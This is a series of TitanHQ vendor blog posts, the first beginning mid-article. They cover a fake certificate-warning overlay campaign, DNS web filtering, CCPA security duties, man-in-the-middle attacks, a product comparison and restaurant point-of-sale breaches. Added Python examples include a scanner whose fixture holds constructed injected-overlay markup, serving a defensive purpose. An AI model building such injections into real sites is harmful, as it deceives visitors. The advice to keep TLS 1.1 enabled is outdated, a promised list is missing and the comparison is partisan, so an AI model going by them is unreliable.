The NET::ERR_CERT_OUT_OF_DATE error message is delivered via an iframe that is overlaid over the website using a jquery.js script. The warning matches the size of the original page, so it is all the visitor sees when they land on the website. If they want to be able to view the content, they are told they should update their security certificate to allow the connection to the website to be made. The content of the message is loaded from a third-party web resource, but the URL displayed is of the legitimate website the user has navigated to.
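A site owner checking whether their own pages carry this kind of injected overlay can look for exactly the two ingredients described above: a script pulled from another origin and an iframe from another origin styled to cover the whole viewport. The Python scanner below is an added example (not from the article, Kaspersky or TitanHQ) that does this over constructed markup; the site origin and the third-party host are placeholders, not real indicators.

```python
"""Flag full-page iframe overlays and scripts loaded from a third-party origin.

Added example, not part of the original article. SAMPLE_HTML is a
constructed stand-in for a compromised page: the legitimate content is
wrapped by an injected script and an iframe that covers the viewport and
pulls a fake certificate warning from another origin. Real pages would be
fetched and fed to scan_page() the same way; only the markup is invented.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_ORIGIN = "https://zoo.example"  # constructed: the site being checked

# Constructed markup; "third-party.invalid" is a placeholder host, not an IoC.
SAMPLE_HTML = """
<html><head><title>City Zoo</title>
<script src="https://zoo.example/js/jquery.js"></script>
<script src="https://third-party.invalid/assets/jquery.js"></script>
</head><body>
<div id="content">Welcome to the zoo</div>
<iframe src="https://third-party.invalid/cert-warning.html"
        style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;border:0"></iframe>
</body></html>
"""


def origin_of(url):
    """scheme://host[:port] for absolute URLs; None for relative ones."""
    parts = urlparse(url)
    if not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def covers_viewport(style):
    """True when inline CSS pins the element over the full page."""
    css = style.replace(" ", "").lower()
    full_width = "width:100%" in css or "width:100vw" in css
    full_height = "height:100%" in css or "height:100vh" in css
    pinned = "position:fixed" in css or "position:absolute" in css
    return full_width and full_height and pinned


class OverlayScanner(HTMLParser):
    """Collect (finding_type, src) pairs for third-party iframes and scripts."""

    def __init__(self, site_origin):
        super().__init__()
        self.site_origin = site_origin.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src")
        if not src:
            return
        origin = origin_of(src)
        third_party = origin is not None and origin != self.site_origin
        if tag == "iframe" and third_party:
            if covers_viewport(attrs.get("style", "")):
                self.findings.append(("fullpage_third_party_iframe", src))
            else:
                self.findings.append(("third_party_iframe", src))
        elif tag == "script" and third_party:
            self.findings.append(("third_party_script", src))


def scan_page(html, site_origin):
    """Return the scanner's findings for one page's HTML."""
    scanner = OverlayScanner(site_origin)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, SITE_ORIGIN):
        print(*finding)
```

A third-party script on its own is common (ad networks, CDNs) and needs an allowlist in practice; the full-page third-party iframe is the finding worth paging on.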
It is not clear how the threat actors compromised the websites. Oftentimes websites are compromised using brute force tactics to guess weak passwords, or exploits are used for vulnerabilities that have not been patched. It is also unclear how people are being sent to the websites. Typically, traffic is sent to the compromised websites through phishing scams or malicious web adverts (malvertising), but visitors could simply navigate to the website through a Google search.
Since the warnings are appearing on legitimate websites, users may think the messages are genuine. One of the compromised websites is the official website of a zoo, another identified by Kaspersky Lab was for a legitimate auto parts dealer. The campaign has been active for at least two months.
Protecting against this method of malware distribution requires a combination of security solutions. Up-to-date anti-virus software is a must to ensure that any files downloaded to business computers are scanned for malware. A web filtering solution such as WebTitan will also provide protection by preventing users from visiting compromised websites that are being used to distribute malware and also blocking downloads of dangerous file types.
Contact TitanHQ today to find out more about web filtering and how you can protect your business from web-based attacks.
Today, February 11, is Safer Internet Day 2020 – a day on which safe and positive use of digital technology is promoted around the world. Safer Internet Day started out as part of the EU SafeBorders project in 2004 but has grown into a global event with more than 150 countries participating and promoting safe use of the internet. The aim of Safer Internet Day is to help create a better and safer internet by empowering everyone to use technology responsibly, respectfully, critically, and creatively. This year’s theme is “A better internet: How to look after yourself and others.”
Everyone has a role to play in making the internet a more positive and safer environment, from seeking positive opportunities to create and connect with others, being kind and respectful to others online, and reporting illegal and inappropriate content.
Businesses that provide Wi-Fi access to their customers also have a responsibility to ensure their Wi-Fi hotspot is not abused and cannot be used to access harmful content, especially by minors. The easiest way to do that is by implementing a web filtering solution and today is the perfect day to get started.
The easiest-to-implement and most cost-effective web filtering solution is a DNS filter. A DNS filter allows content to be controlled at the DNS lookup stage of internet access, when the human-friendly domain name of a website is converted to an IP address that a computer uses to find the server hosting the website. This method of web filtering requires no hardware purchases or software downloads. You simply point your network’s DNS settings at your DNS filtering service provider. You then access a web-based interface and stipulate the categories of content your customers are not permitted to access. Getting started takes just a few minutes. Since all filtering takes place at the DNS level before any content is downloaded, this form of web filtering has almost zero latency, which means internet speeds are unaffected.
With WebTitan Cloud for Wi-Fi you can decide on the content that you don’t want people to access and can use the checkboxes in your user interface to block categories of web content with the click of a mouse. To make the internet family friendly, you can check the adult content checkbox to ensure pornographic material cannot be accessed through your Wi-Fi network. You can also block access to illegal websites to protect your business, such as torrent sites where copyright-infringing downloads of music, software, and films take place. Controls can also be applied to limit access to streaming websites to conserve bandwidth and make sure everyone can enjoy fast internet speeds.
WebTitan has categorized more than 500 million websites into 53 categories, including all of Alexa’s top million websites and web content in 200 languages. You can set internet content controls for different locations, different user groups, and you can manage multiple locations through a single portal.
Blacklists are a useful way to ensure unsuitable or illegal content cannot be accessed. One of the main blacklists is maintained by the Internet Watch Foundation and includes webpages and websites known to host child pornography and child abuse-related content.
Blacklists also protect Wi-Fi users from malicious content, such as phishing websites and sites hosting malware and ransomware, which can help you to protect your users and your company’s reputation.
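To make the lookup-time decision described in the preceding paragraphs concrete, here is an added Python model of a DNS filter's policy engine (example code, not WebTitan's implementation): the queried name is matched against a category database from the most specific label outward, the per-location policy of blocked categories is applied, a blacklist overrides everything, and blocked lookups are answered with a block-page address instead of the real one. The category data, blacklist, policies, upstream answers and block-page address are all constructed.

```python
"""DNS-level category filtering with blacklist precedence (simulation).

Added example, not part of the original article or of any TitanHQ product.
Everything below is constructed: the category database, the blacklist,
the per-location policies, the upstream answers and the block-page IP.
"""
BLOCK_PAGE_IP = "192.0.2.10"  # constructed: where blocked lookups are sent

# Constructed category database. A more specific name (cdn.video-stream.test)
# can carry its own category, so lookups walk from the full name outward.
CATEGORIES = {
    "example-news.test": "news",
    "adult-site.test": "adult",
    "torrent-hub.test": "p2p",
    "video-stream.test": "streaming",
    "cdn.video-stream.test": "cdn",
    "bank.test": "finance",
}

# Constructed blacklist of phishing/malware hosts: blocked for every location.
BLACKLIST = {"login-bank.test", "malware-drop.test"}

# Constructed per-location policies: the "checkboxes" of blocked categories.
POLICIES = {
    "cafe-wifi": {"adult", "p2p"},
    "school": {"adult", "p2p", "streaming"},
}

# Constructed upstream resolver answers used when a lookup is allowed.
UPSTREAM = {
    "www.example-news.test": "198.51.100.20",
    "cdn.video-stream.test": "198.51.100.30",
}


def _candidates(qname):
    """Yield the name and each parent domain, most specific first."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def lookup_category(qname):
    """Most specific categorised parent wins; unknown names are uncategorized."""
    for candidate in _candidates(qname):
        if candidate in CATEGORIES:
            return CATEGORIES[candidate]
    return "uncategorized"


def is_blacklisted(qname):
    """A blacklisted domain blocks all of its subdomains too."""
    return any(candidate in BLACKLIST for candidate in _candidates(qname))


def filter_query(qname, location, resolve):
    """Return (answer_ip, verdict, reason) for one DNS query.

    resolve() stands in for the upstream lookup that only happens when the
    query is allowed; blocked queries never reach it.
    """
    if is_blacklisted(qname):
        return BLOCK_PAGE_IP, "block", "blacklist"
    category = lookup_category(qname)
    if category in POLICIES.get(location, set()):
        return BLOCK_PAGE_IP, "block", f"category:{category}"
    return resolve(qname), "allow", f"category:{category}"


def fake_resolve(qname):
    """Constructed upstream resolver; unknown names get a constructed default."""
    return UPSTREAM.get(qname.lower(), "198.51.100.1")


if __name__ == "__main__":
    for name, loc in [("www.adult-site.test", "cafe-wifi"),
                      ("www.video-stream.test", "school"),
                      ("www.login-bank.test", "school"),
                      ("www.example-news.test", "cafe-wifi")]:
        print(loc, name, filter_query(name, loc, fake_resolve))
```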
WebTitan Cloud for Wi-Fi is ideally suited to all businesses that provide Wi-Fi access, such as:
Wireless Wi-Fi ISPs, MSPs and other Wi-Fi service providers
Cafes, coffee shops & restaurants
Retail outlets & shopping malls
Schools & universities
Health systems & hospitals
Rail & bus networks
This Safer Internet Day is the perfect time to implement a DNS filtering solution to make your Wi-Fi (or wired) network much safer for all users.
To find out more about WebTitan Cloud for Wi-Fi, WebTitan Cloud for wired networks, for a product demonstration, or to register for a free trial, contact TitanHQ today.
Spam email may be the most common method of distributing malware and phishing for sensitive information such as Office 365 credentials, but businesses also need to protect against web-based threats.
Malware and ransomware are often unwittingly downloaded from the internet by employees when browsing the internet. Hackers are constantly attacking legitimate websites and uploading malicious content, and malware-laced files are often hosted on file sharing sites such as Dropbox and Google Drive.
Many owners of high traffic websites use third-party ad networks to bring in much needed extra revenue. Ad blocks are added to websites and the site owners earn money from the number of ad impressions or clicks. Cybercriminals often sneak malicious adverts onto these networks, and they are displayed on many high traffic websites. The malicious adverts link to websites hosting exploit kits that probe for exploitable vulnerabilities in browsers and plugins. If a vulnerability is found, it is exploited to silently download malware.
Phishing emails often have a web-based component. A hyperlink is supplied which links to a website hosting a phishing kit. An email security solution may fail to detect the hyperlink as malicious and will deliver the email. If an employee clicks the link, there may be no protection in place to prevent that site from being accessed and credentials being handed over.
There has also been an increase in malware downloads through social media websites in recent years. Research from Bromium in 2019 showed one in five companies had experienced a malware infection as a result of employees visiting social media websites and 12% of companies suffered a data breach as a result of the malware infection.
Over the summer last year, a multi-year social media campaign dubbed Operation Tripoli was uncovered. The social media malware campaign targeted users in Libya, but Facebook users in other countries were also infected with malware. Malicious code is also inserted into images which are shared on Facebook and Facebook Messenger. That code similarly downloads malware.
Businesses also face other problems from the use of social media sites by employees: A major loss in productivity. According to a Spiceworks survey, 28% of employees at large companies and 45% of employees at medium-sized companies spend four or more hours a week on personal internet usage such as visiting social media sites. The same study also revealed 38% of companies had experienced a security incident as a result of employees’ personal internet usage.
Fortunately, there is a solution that will block internet-based threats and also allow businesses to make significant productivity gains by curbing personal internet usage. Further, the solution is easy to implement, requires little maintenance, and is cost effective. That solution is WebTitan.
WebTitan is a DNS filtering solution ideally suited to SMBs and MSPs that serve the SMB market. WebTitan is a 100% cloud-based web filtering solution, so no software downloads are required and there are no hardware requirements. Simply point your DNS to WebTitan and you will be filtering the internet in minutes. You will block access to known malicious websites, be able to control what types of files can be downloaded from the internet, and you can block access to certain categories of website or filter at the web page level. Highly granular filtering means it is easy to selectively block content. WebTitan allows you to block access to social media sites or just Facebook Messenger if you wish. You can filter at the organization, user group, or individual user level and can set time-based controls.
A full suite of reports allows you to see exactly what types of sites are being accessed, who attempts to violate your policies, and you can also view internet usage in real-time.
WebTitan adds an extra layer to your security defenses that will protect you from the full range of web-based threats. By blocking phishing attacks and malware downloads and allowing you to make significant productivity gains the solution will more than pay for itself.
To find out more about web filtering with WebTitan, give the TitanHQ team a call today.
On January 1, 2020, the California Consumer Privacy Act (CCPA) took effect, giving state residents greater control over the use and sale of their personal data and introduced. In this post we explore the CCPA data security requirements for businesses and the consequences of failing to adequately protect consumer data.
What is the California Consumer Privacy Act?
California already had some of the strictest privacy laws in the United States, but CCPA took consumer privacy a step further. CCPA has been likened to the EU’s General Data Protection Regulation (GDPR), as it gives California residents similar rights over the personal data collected and used by companies.
CCPA requires companies to inform California residents about the categories of data that are being collected, at or before the point of collection. There is a right to access all personal information held by a company and find out with whom personal data has been shared. Consumers have a right to opt out and prevent their personal data from being sold and can request that their personal data is deleted. Consumers also have a right to equal services and prices, and cannot be discriminated against, or denied goods or services or levels of services if they opt out of the sale of their personal data.
Who Must Comply with CCPA?
As of January 1, 2020, CCPA applies to all companies that do business with California residents, regardless of where the company is based, if one of the following conditions is met:
The company generates revenues of at least $25 million each year; or
The company collects, purchases, sells, or shares the personal data of at least 50,000 people; or
The company generates at least 50% of its revenues from the sale of personal data
CCPA does not apply to insurance institutions, agents, and support organizations, which are covered by different state laws.
CCPA Data Security Requirements
CCPA does not specify what security measures need to be implemented to protect the personal data of California residents; however, businesses do have a duty to implement reasonable security measures based on the level of risk, in accordance with other state laws. Under CCPA, penalties can be applied for a “violation of the duty to implement and maintain reasonable security procedures and practices.”
Since legal action can be taken against companies over a breach of personal data, it is important for companies to ensure appropriate measures are taken to protect data and prevent data breaches.
CCPA does not specify what controls need to be implemented nor what constitutes “reasonable security procedures and practices.” A 2016 Data Breach Report released by the California Attorney General acts as a good guide. It includes a list of 20 controls that the Center for Internet Security says are requirements to protect against known cyberattack vectors. These should therefore serve as a guide to the CCPA data security requirements. They are:
How TitanHQ Can Help You Comply with CCPA Data Security Requirements
Email is the most common attack vector used for phishing and malware distribution, so safeguards need to be implemented to keep email systems secure. Phishing attacks often have a web-based component where credentials are harvested, and many malware downloads occur via the internet. Internet controls are therefore also essential to protect against cyberattacks and data breaches. Due to the risk of attack via email and the web, email and browser protections are listed as the first of the foundational Center for Internet Security controls.
This is an area where TitanHQ can help. We have developed two powerful cloud-based security solutions that can help you meet CCPA data protection requirements.
SpamTitan Email Security is a powerful spam filtering solution that keeps inboxes free from email-based threats. SpamTitan incorporates multiple layers of anti-spam and anti-phishing controls, including Sender Policy Framework (SPF), DMARC, SURBLs, RBLs, Bayesian analysis and more. SpamTitan uses twin antivirus engines to block known malware threats and sandboxing to protect against breaches and data loss from zero-day threats.
WebTitan is a cloud-based DNS filtering solution that protects against the internet component of phishing attacks and stops wired and wireless network users from accessing malicious websites. These solutions will help you meet your email and web security responsibilities and protect your organization from phishing attacks, malware and ransomware downloads. Together they will help you prevent costly data breaches and avoid the resultant CCPA fines.
Penalties for Noncompliance with CCPA
Each intentional violation carries a maximum penalty of $7,500 per record. Unintentional violations carry a penalty of $2,500 per record.
There is also a private cause of action in CCPA. In the event of a data breach, victims of the breach can sue for a CCPA violation. Statutory damages of between $100 and $750 can be claimed by each California resident affected by the breach, or actual damages, whichever is greater, along with other relief determined by the courts. Class action lawsuits are also permitted under CCPA. The California Attorney General can also take legal action against the company rather than permitting civil suits to be filed.
TitanHQ and Pax8 have announced a new strategic partnership that will see TitanHQ’s cloud-based email security and DNS filtering solutions incorporated into the Pax8 ecosystem.
Pax8 simplifies the journey into the cloud through billing, provisioning, automation and industry-leading PSA integrations and is a proven leader in cloud distribution. Pax8 has achieved position 60 in the 2019 Inc. 5000 list of the fastest growing companies and has been named CRN’s Coolest Cloud Vendor and Best in Show at the NextGen and Xchange conferences for two years in a row.
In order to have products added to the Pax8 marketplace, vendors must have developed exceptional channel friendly solutions. As the leading provider of cloud-based email and web security solutions for managed service providers (MSPs) serving the SMB marketplace, TitanHQ was an ideal fit.
Under the new partnership, Pax8 partners will have easy access to TitanHQ’s leading email security solution, SpamTitan Cloud, and can protect clients from web-based threats with WebTitan Cloud, TitanHQ’s DNS filtering solution.
These cloud-based AI-driven solutions help MSPs secure their own environments and protect their clients from malware, ransomware, botnets, viruses, and phishing and email impersonation attacks and avoid costly data breaches.
Both solutions have been developed with MSPs firmly in mind. The solutions are easy to integrate into an MSP’s security stack through TitanHQ’s APIs, there are multiple hosting options, the solutions can be supplied in white label form, and there are generous margins. Pax8 partners also benefit from a fully transparent pricing policy and industry leading technical support.
TitanHQ’s solutions are much loved by users and are consistently rated highly on business software review platforms, including G2 Crowd, Gartner Peer Insights, and Capterra.
“Our partners are excited about the addition of TitanHQ and the ability to protect their clients’ businesses by blocking malware, phishing, ransomware, and links to malicious websites from emails,” said Ryan Walsh, chief channel officer at Pax8.
You will no doubt have heard of a man in the middle (MiTM) attack. Here we define this attack method, explain how a MiTM attack occurs, and show you how to prevent a man in the middle attack and keep your devices and networks secure.
What is a Man in the Middle Attack?
Man in the middle attacks are commonly cited as a threat, but what exactly is a man in the middle attack? As the name suggests, it is a scenario in which a person inserts him or herself between two communicating systems and intercepts the conversations or data sent between the two. It is the computer equivalent of eavesdropping on a phone call where neither party is aware that their conversation is not private and confidential.
With a phone call, eavesdropping would allow an attacker to gather a host of sensitive information, which is divulged verbally between both parties. In this scenario, the attacker does not influence the conversation. He/she must wait until a valuable nugget of information is disclosed by either party.
A MiTM attack is concerned with intercepting data transferred between two parties. This could be data sent between a smartphone app and a server, between two parties on a messaging app such as WhatsApp, or an email conversation between two parties. It could also be communication between a user’s browser and a website.
In contrast to the telephone call scenario, which is passive, in a MiTM attack the attacker can influence what is being said. In fact, with a MiTM attack, the two people or systems communicating are not really communicating with each other. Each is communicating with the attacker.
Take email for example. Person A initiates an email conversation with Person B and requests a wire transfer to pay for services rendered. Person A supplies the bank details, and Person B agrees to the wire transfer. Various details are discussed, and the transfer is eventually made. There could be 10 or more messages sent by each party in the conversation. Each message between the two is altered by the attacker, crucially including the bank account details for the transfer. Neither party has been communicating with each other, yet both parties would be convinced they are.
Types of Man in the Middle Attack
The goal of a MiTM attack is to intercept information, usually for financial gain, but there are different ways that this can be achieved. Generally speaking, there are four main ways that a MiTM attack occurs: packet sniffing, packet injection, session hijacking, and SSL stripping.
Packet sniffing is one of the most common MiTM attack methods and is a type of eavesdropping or wiretapping, except it is not phone conversations that are obtained but the packets of data sent between the two systems. Packet sniffing is much easier when sensitive data is not encrypted, such as when information is exchanged between a browser and an HTTP website, rather than an HTTPS website where the connection is encrypted.
The email example above is a type of packet injection. Data is not only intercepted: additional packets are introduced, or existing data packets are altered. For instance, malware could be introduced.
Session hijacking is where an attacker takes over an existing session, such as a session between a browser and a banking website after the user has logged in; in that case the attacker, not the user, is in control of the session. SSL stripping is where an HTTPS session, which should be secure because it is encrypted, is downgraded from HTTPS to plain HTTP so that the data passing over it can be read. The same interception technique is used legitimately by web filtering solutions that feature SSL inspection, which allows businesses to check for threats in encrypted traffic.
How to Prevent a Man in the Middle Attack
Fortunately, MiTM attacks can be difficult to perform, so the potential for an attack is limited, but there are skilled hackers who can – and do – perform these attacks and gain access to sensitive data and empty bank accounts. One of the most common examples is a coffee shop scenario where an attacker creates an evil twin hotspot. When a user connects to this evil twin – a Wi-Fi network set up to look like the genuine coffee shop Wi-Fi hotspot – all data sent between their browser and the website is intercepted.
There are several steps you can take to prevent a Man in the Middle Attack.
Never disclose sensitive data when connected to an untrusted public Wi-Fi network. Only ever connect via a VPN, and ideally wait until you are on a trusted Wi-Fi network to access online bank accounts.
Ensure the website is protected by an SSL certificate (starts with HTTPS). Bear in mind that hackers also use SSL certificates, so HTTPS does not mean a website is genuine.
Do not use hyperlinks included in emails; always visit the website directly by typing the correct URL into your browser or finding the correct URL through a Google search.
Do not install unauthorized software or apps from third-party app stores, and do not download or use pirated software.
Businesses should implement a DNS filtering solution to protect their workers and prevent them from visiting malicious websites.
Make sure your networks are secured and have appropriate security tools installed.
Disable insecure SSL/TLS protocols on your website (only TLS 1.1 and TLS 1.2 should be enabled) and implement HSTS.
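The SSL stripping attack described above and the HSTS recommendation in the last step are two sides of the same mechanism. The Python example below, added here and not taken from the original post or from any TitanHQ product, models how a browser's HSTS cache defeats a stripped link: a Strict-Transport-Security policy is only accepted when the header arrived over TLS, it lapses after max-age, and any later http:// navigation to a known host (or a subdomain, when includeSubDomains is set) is upgraded before a plaintext request is ever sent. Host names such as bank.example are constructed placeholders.

```python
import time
from dataclasses import dataclass
from urllib.parse import urlsplit, urlunsplit


@dataclass
class HstsPolicy:
    expires_at: float        # absolute time (seconds) at which the policy lapses
    include_subdomains: bool


class HstsStore:
    """Minimal model of a browser's HSTS cache (RFC 6797 semantics, simplified)."""

    def __init__(self, now=time.time):
        self.now = now           # injectable clock so expiry can be tested deterministically
        self._policies = {}      # host -> HstsPolicy

    def record_header(self, host, header_value, over_tls):
        """Store the policy carried by a Strict-Transport-Security header.

        Returns True if a policy was stored or cleared, False if the header was ignored.
        Headers received over plain HTTP are ignored: that is what stops someone sitting
        on an unencrypted connection from planting or clearing a policy.
        """
        if not over_tls:
            return False
        directives = {}
        for part in header_value.split(";"):
            name, _, value = part.strip().partition("=")
            if name:
                directives[name.strip().lower()] = value.strip().strip('"')
        max_age = directives.get("max-age", "")
        if not max_age.isdigit():
            return False            # max-age is mandatory; a malformed header is ignored
        host = host.lower()
        if int(max_age) == 0:
            self._policies.pop(host, None)   # max-age=0 tells the client to forget the host
            return True
        self._policies[host] = HstsPolicy(
            expires_at=self.now() + int(max_age),
            include_subdomains="includesubdomains" in directives,
        )
        return True

    def is_known_host(self, host):
        """True if host, or a parent domain with includeSubDomains, has a live policy."""
        labels = host.lower().split(".")
        now = self.now()
        for i in range(len(labels)):
            policy = self._policies.get(".".join(labels[i:]))
            if policy and policy.expires_at > now and (i == 0 or policy.include_subdomains):
                return True
        return False

    def resolve(self, url):
        """Rewrite an http:// URL to https:// when the host has an HSTS policy.

        A stripped link (https downgraded to http by a MiTM) therefore never
        produces a plaintext request from a client that already knows the host.
        """
        parts = urlsplit(url)
        if parts.scheme != "http" or not parts.hostname or not self.is_known_host(parts.hostname):
            return url
        netloc = parts.hostname
        if parts.port not in (None, 80):     # explicit non-default ports are preserved
            netloc = f"{netloc}:{parts.port}"
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    store = HstsStore()
    store.record_header("bank.example", "max-age=31536000; includeSubDomains", over_tls=True)
    print(store.resolve("http://www.bank.example/login"))   # upgraded to https://
    print(store.resolve("http://other.example/login"))      # unknown host, left alone
```

The first-visit gap remains: a client that has never reached the site over HTTPS has no policy to apply, which is why HSTS is paired with a long max-age and, for high-value sites, submission to the browser preload list.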
At face value, SpamTitan and VadeSecure may appear to be equivalent products. In this post we offer a comparison of SpamTitan and VadeSecure to help managed service providers (MSPs) differentiate between the two solutions.
SpamTitan and VadeSecure
SpamTitan and VadeSecure are two email security solutions that block productivity-draining spam emails, phishing emails, and malspam – spam emails that deliver malware or malware downloaders. These cloud-based solutions assess all incoming emails and determine whether they are genuine communications, unwanted spam, or malicious messages and deal with them accordingly to prevent employees from opening the messages.
TitanHQ is the leading provider of cloud-based email and web security solutions for MSPs that serve the SMB market and has been providing email security for MSPs for more than two decades. SpamTitan is TitanHQ’s email security offering, which has been developed for SMBs and MSPs that serve the SMB market.
VadeSecure is a French company that has developed an email security solution for the SMB market. As is the case with SpamTitan, VadeSecure offers protection from email-based threats and provides an important extra layer of security, especially for Office 365 environments. The company is now venturing into the MSP market and has recently raised an additional $79 million in venture capital to help it make inroads into the MSP market. However, at present, the solution is primarily geared toward SMBs rather than MSPs that serve them.
Enhanced Phishing Protection for Office 365 Accounts
Office 365 is the most widely used cloud service by user count and 2019 figures show that Office 365 cloud services are used by 1 in 5 corporate employees, with Office 365 email being the most common. With so many businesses using Office 365 for email, it should come as no surprise that Office 365 email accounts are being heavily targeted by hackers and scammers.
Microsoft does have measures in place to block spam and phishing emails, but the level of protection provided by Exchange Online Protection (EOP) is not sufficient for many businesses. A large percentage of phishing emails manage to sneak past Microsoft’s defenses. According to research from Avanan, 25% of phishing emails are delivered to Office 365 inboxes.
Consequently, additional protection is required, and many businesses choose to implement an anti-phishing solution provided by third parties such as SpamTitan and VadeSecure. MSPs also offer third party solutions to block phishing attacks on Office 365 accounts, not only to better protect their customers, but also to reduce the amount of time they spend mitigating phishing attacks that have not been blocked by EOP.
SpamTitan and VadeSecure have been developed to work on top of Office 365 and add an important extra layer of protection for Office 365 email.
Here we will concentrate on a comparison of SpamTitan and VadeSecure with a specific focus on the features and benefits for MSPs rather than SMBs.
Comparison of SpamTitan and VadeSecure for MSPs Serving the SMB Market
Since VadeSecure has historically focused on the Telco market, the email security solution lacks many features that make MSPs’ lives easier and does not provide the level of control, flexibility, or the management tools and reports that MSPs seek. SpamTitan has been developed by MSPs for MSPs, so important features for MSPs have always been offered. We will cover these features below, but initially it is useful to include an infographic that summarizes some of the basic features of SpamTitan and VadeSecure for comparison purposes.
Basic Features of SpamTitan and VadeSecure
SpamTitan Features for MSPs Not Offered by VadeSecure
This comparison of SpamTitan and VadeSecure may seem a little one-sided, and that is because VadeSecure is very much focused on end users rather than MSPs. No doubt the solution will be updated to incorporate more MSP-friendly features over time as the company tries to move into the MSP market, but at present, the features below are provided by SpamTitan but are not offered by VadeSecure.
Configuration Flexibility and Customization Potential
One of the biggest bugbears with VadeSecure is the inability to configure the solution to suit the needs of MSPs. It is not possible to create custom rules, for instance, so MSPs must instead use the Exchange Admin functionality of Office 365.
With SpamTitan, MSPs can create rules based on their own requirements and the needs of each individual client, and those rules can be highly granular and can easily be applied to specific groups, users, and specific domains. That level of granularity and the ease of customization allows MSPs to fine-tune filtering policies to maximize the detection of threats while minimizing false negatives. MSPs can easily select more permissive or more aggressive policies for each client, but with VadeSecure there is no option for customization for each customer.
SpamTitan includes a full multi-tenancy view of all customers, with multiple management roles. This allows MSPs to easily monitor their entire customer base and trial base, assess the health of the deployments, view activity volumes across all customers, and quickly identify issues that require attention. With VadeSecure, there is no possibility of integrating with PSAs and RMMs, and there is no customer-wide view of the entire system.
Highly Granular Reporting
MSPs can tell their clients how important it is to improve their security defenses, but they must also be able to demonstrate that the solutions are proving effective at blocking threats to ensure they can continue to provide those services and receive regular, repeating revenue.
With SpamTitan, MSPs have highly granular reports that give them full visibility into what is happening and a detailed view of system performance. Client reports can easily be generated to show them how effective the solution is and why it is important to keep it in place. Furthermore, this level of reporting – per domain, per group, and at the group domain level – gives MSPs the information they need to identify potential issues and obtain detailed information on spam emails. The solution also has the management capabilities to allow any issues to be quickly identified and corrected to ensure the solution remains effective over time. With VadeSecure, visibility and control options are lacking, and there is no way to measure how effective the solution is or to demonstrate that to clients.
High Margins and Significant Revenue Potential
As previously mentioned, the flexibility and scope for customization is a real benefit for MSPs as it allows them to add more value through superior management capabilities. That means MSPs can build solutions that really benefit their clients and it helps them become more of a strategic partner rather than an IT service provider. It is much harder for clients to change a strategic partner than switch IT service providers. VadeSecure lacks this customization which means it is not possible for MSPs to add value to generate reliable, recurring revenue.
Further, with VadeSecure you get one product, but TitanHQ offers a trio of solutions for MSPs to better protect their clients and add more recurring revenue streams. Through the TitanShield for Service Providers program, MSPs also have access to WebTitan DNS filtering and ArcTitan email archiving. This allows MSPs to maximize revenue from each client by cross-selling new services, while also offering a layered security package to protect clients from the full range of email- and web-based threats.
Fully Transparent Pricing
When it comes to pricing, VadeSecure (and many other email security solutions) lack transparency and the pricing model is complex and expensive. Several features are not included as standard with VadeSecure and come at an additional cost. This makes it hard to perform a SpamTitan and VadeSecure pricing comparison.
For instance, with VadeSecure the solution is priced per module, so the Greymail, Spam, and Virus Protection options are not provided as standard and have to be added onto the cost. Based on feedback we have received from MSPs the solution is expensive, which reduces MSP profits and makes the email security solution more difficult to sell to SMBs.
With VadeSecure, the total number of users is not aggregated, which shows a lack of experience of working with MSPs. An MSP with 100 x 10-seat licenses will pay for 100 separate 10-seat licenses rather than 1,000 seats overall. As such, discounts will be far lower.
With SpamTitan there is just one price which includes all features, including sandboxing, full support, dual anti-virus protection, all security modules, and updates. Furthermore, the price is exceptionally competitive (less than $1 per user). The pricing model was created to incorporate the flexibility for dealing with fluctuating numbers of customers, which often happens when providing managed email services.
Effectiveness at Blocking Threats
Price, usability, and flexibility are all important for MSPs, but features and benefits are the icing on the cake. Email security solutions are used to protect against threats, so the effectiveness of a solution is critical. SpamTitan and VadeSecure are effective at blocking threats and will provide an important additional layer of security for Office 365 users, but feedback we have received from MSPs shows there is a clear winner.
VadeSecure includes ‘time-of-click’ protection against embedded hyperlinks, which rewrites URLs and sends them to a scanner. However, MSPs have reported that it can take a long time for phishing emails to be detected, even after the same threats are already being blocked by Chrome. That means that phishing emails are being delivered and there is a window during which a successful attack could occur. This URL click feature only appears to work in OWA or the Outlook client, as it is an API integration with Office 365.
SpamTitan includes more advanced detection methods to ensure that malicious URLs are detected and phishing emails are filtered out. SpamTitan includes SURBL filtering and other malicious URL detection mechanisms that complement the default mechanisms in Office 365 such as Recipient Verification Protocols, Sender Policy Frameworks, and Content Filter Agents. This means end users are better protected and there is a much lower probability of a phishing email evading detection.
Dual anti-virus protection is also provided and SpamTitan features a sandbox where suspicious attachments can be safely analyzed for malicious actions. This provides superior protection against malware, ransomware, and zero-day threats that are not detected by the two AV engines.
Any business that processes card payments is a target for cybercriminals, but restaurants in particular are favored by hackers. Over the past few weeks, cybercriminals have stepped up their efforts to attack these businesses and several restaurant chains have had their systems compromised. In all cases, malware has been installed on point-of-sale systems that steals payment card information when diners pay for their meals.
Many of the attacks have hit restaurant chains in the Midwest and East, with credit card data from diners recently having been listed for sale on the underground marketplace, Joker’s Stash. A batch of approximately 4 million credit and debit cards is being offered for sale, which comes from malware attacks at Moe’s, McAlister’s Deli, Krystal, and Schlotzsky’s.
The cyberattack on Krystal was detected in November, with the other three chains, all owned by Focus Brands, attacked in August. In total, the above chains have more than 1,750 restaurants and almost half of those locations, mostly in Alabama, Florida, Georgia and North and South Carolina, were affected.
Catch Hospitality Group also announced in November that it had suffered a cyberattack which had seen malware installed on its point-of-sale system that scraped and exfiltrated payment card data as diners paid for their meals. The data breach affected customers of Catch NYC, Catch Roof, and Catch Steak restaurants. Fortunately, the devices used to process the majority of payments were unaffected. Malware was on the Catch NYC and Catch Roof devices between March 2019 and October 2019, with Catch Steak affected between September 2019 and October 2019.
Church’s Chicken restaurants were also attacked in a separate incident in October. The majority of its 1,000+ restaurants were not affected, but at least 160 restaurants in Alabama, Arkansas, Florida, Georgia, Illinois, Louisiana, Mississippi, Missouri, South Carolina, Tennessee and Texas had malware installed on their POS system.
